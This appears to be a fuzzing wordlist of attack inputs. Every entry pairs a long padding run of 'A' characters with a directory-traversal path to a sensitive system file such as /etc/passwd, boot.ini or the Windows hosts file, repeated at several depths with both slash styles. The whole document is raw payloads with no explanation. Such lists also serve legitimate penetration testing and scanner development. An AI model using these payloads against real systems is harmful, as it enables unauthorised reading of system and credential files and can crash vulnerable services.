-AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA../../../../etc/issue -AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA../../../../boot.ini -AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA../../../../windows/system32/drivers/etc/hosts -AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA../../../../../etc/passwd -AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA../../../../../etc/issue -AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA../../../../../boot.ini -AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA../../../../../windows/system32/drivers/etc/hosts -AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA../../../../../../etc/passwd -AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA../../../../../../etc/issue -AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA../../../../../../boot.ini -AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA../../../../../../windows/system32/drivers/etc/hosts -AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..\etc\passwd -AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..\etc\issue -AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..\boot.ini -AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..\windows\system32\drivers\etc\hosts -AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..\..\etc\passwd -AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..\..\etc\issue -AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..\..\boot.ini -AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..\..\windows\system32\drivers\etc\hosts -AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..\..\..\etc\passwd -AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..\..\..\etc\issue -AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..\..\..\boot.ini -AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..\..\..\windows\system32\drivers\etc\hosts -AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..\..\..\..\etc\passwd -AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..\..\..\..\etc\issue -AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..\..\..\..\boot.ini -AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..\..\..\..\windows\system32\drivers\etc\hosts -AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..\..\..\..\..\etc\passwd 